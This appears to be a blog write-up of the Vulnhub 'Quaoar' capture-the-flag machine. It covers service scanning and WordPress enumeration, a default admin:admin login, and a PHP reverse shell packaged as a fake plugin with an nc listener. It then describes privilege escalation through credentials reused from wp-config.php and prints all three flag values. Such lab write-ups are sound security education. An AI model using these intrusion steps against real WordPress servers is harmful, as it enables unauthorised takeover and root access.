Another week, another CTF under my belt. Been doing a lot of CTF games the past months. This time I took some time off my schedule to play with the hackfest2016: Quaoar game. The difficulty level on this one is pretty low, which suited me fine this time around. It’s nice to have something to keep oneself occupied that doesn’t require much braining. Anyway, lets cut to the chase!

Description

From Vulnhub:

Welcome to Quaoar
This is a vulnerable machine i created for the Hackfest 2016 CTF http://hackfest.ca/

Difficulty : Very Easy

Tips:

Here are the tools you can research to help you to own this machine. nmap dirb / dirbuster / BurpSmartBuster > nikto wpscan hydra Your Brain Coffee Google 🙂

Goals: This machine is intended to be doable by someone who is interested in learning computer security There are 3 flags on this machine 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box

Feedback: This is my first vulnerable machine, please give me feedback on how to improve ! @ViperBlackSkull on Twitter simon.nolet@hotmail.com Special Thanks to madmantm for testing

SHA-256 DA39EC5E9A82B33BA2C0CD2B1F5E8831E75759
C51B3A136D3CB5D8126E2A4753

You may have issues with VMware_

Service discovery

This game did not require hunting for its IP address since it show it already at the login prompt. Cutting directly to service discovery:

Command
sudo nmap -p1-65535 -A -T4 -sS 192.168.110.14

Services found

Service scan revealed some interesting services:

Port Service Product
22 ssh OpenSSH
53 domain ISC BIND
80 http Apache httpd
110 pop3
139 netbios-ssn Samba smbd
143 imap Dovecot imapd
445 netbios-ssn Samba smbd
993 imap Dovecot imapd
995 pop3s

In addition, the scan stumbled over the following:

Service Found
ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0
domain bind.version: 9.8.1-P1
http folder Hackers, robots.txt
pop3 dovecot pop3d supporting SASL TOP PIPELINING UIDL RESP-CODES STLS CAPA
netbios workgroup: WORKGROUP
imap post-login ID OK IMAP4rev1 LITERAL+ listed STARTTLS

This game seem propped with all sorts of services. They may be a complete hoax, such things happen. At this moment I do not know if these services will come in handy later on.

Flag hunt

First flag: web

Most games wants you to investigate the web part first. Visiting it in Firefox didn’t reveal anything interesting, neither in HTML source or the images shown. Nmap did uncover a robots.txt file and I began looking closer into it:

State Path Comment
Disallowed Hackers Does not exist
Allowed /wordpress/ Exists.

Not much to go by here, except WordPress. Trying dirb to push my luck:

$ dirb http://192.168.110.14 /usr/share/dirb/wordlists/big.txt -o dirb_scan.txt -w

This certainly took a while. After a couple of minutes I just killed dirb and looked at the results. There seems to be a CMS (Lepton CMS) lurking in the shadows on this target. Toyed with the paths found and it appeared the CMS does absolutely nothing. Decided to skip it and focus on WordPress instead.

WordPress

Looking at WordPress installations is always fun. Time to bring out WpScan, adding in user enumeration for good measure:

sudo wpscan --url http://192.168.110.14/wordpress/ --enumerate u

Found:

What Fact
/readme.html WordPress version 3.9.14
/wp-content/uploads/ Upload directory has directory listing enabled

Also found these users:

Id Login Name
1 admin admin
2 wpuser wpuser

Seems like a normal WordPress site set up in a hurry. Perhaps whoever responsible set it up using default credentials (admin:admin)? It’s worth a try!

HF16Q - WordPress logged in
Logged in as Admin

Fascinating results! It is time to get shell access. Now, there are a couple of routes to do this. I often land on creating a fake plugin.

Getting shell

As mentioned, I am going to create a fake plugin. First I bring out my trusty Shelly shell (you path may vary):

$ cp /usr/share/webshells/php/php-reverse-shell.php shelly.php

Then add a nice plugin wrapper around it:

<?php

/*
Plugin Name: Shelly
Plugin URI: http://localhost  
Description: Bla Bla Bla  
Author: Pingmoose
Version: 1.0.1  
Author URI: http://localhost  
*/

COPY CONTENTS OF shelly.php HERE

?>

Prepared Shelly with my IP address and listening port, then finally zipping the entire thing down:

$ zip shelly-plugin.zip shelly.php

Then installing the plugin, without activating it:

HF16Q - WordPress uploaded shell
Plugin uploaded

Setting up listener:

$ nc -lvp 4444

Activating the shell, visiting 192.168.110.14/wordpress/wp-content/plugins/shelly-plugin/shelly.php. Connection successfully picked up by listener and thus got shell:

Got shell:

HF16Q - Shell access
Shell access

Current shell is somewhat limited, spawning a new shell using a Python gem:

$ whoami
$ whereis python
$ python -c 'import pty; pty.spawn("/bin/bash")'

Looked around in the /home folder and found a flag hiding in the wpadmin folder (flag.txt). First flag: 2bafe61f03117ac66a73c3c514de796e.

HF16Q - First flag
First flag

Second flag: chasing ROOT

Moving on trying to get ROOT access. First I tried to find if there were any scripts laying around which I could abuse:

$ cd /
$ find / -perm -4000 -user root 2> /dev/null

Nothing of interest found. Given that the WordPress installation looks like been set up in a hurry, maybe passwords were reused as well? Best place is to look at /var/www/wordpress/wp-config.php first:

HF16Q - Looking at WPConfig
Credentials in wp-config.php

Hit gold. I think the hint couldn’t be any clearer. Password is literally rootpassword!

HF16Q - ROOT flag
Second flag

Navigated over to /root and found the flag: 8e3f9ec016e3598c5eec11fd3d73f6fb. According to the introduction text for this game there should be third flag hidden somewhere.

Third flag: dancing like Indiana Jones

Time to do some braining. I am ROOT, thus I can do everything. Got a gut feeling the last flag is tucked away in plain text, perhaps in a comment somewhere. This step I did manually by starting looking in /etc. Found what I was looking for in /etc/cron.d/php5:

HF16Q - Third flag
Third flag

The third flag: d46795f84148fd338603d0d6a9dbf8de

Advertisements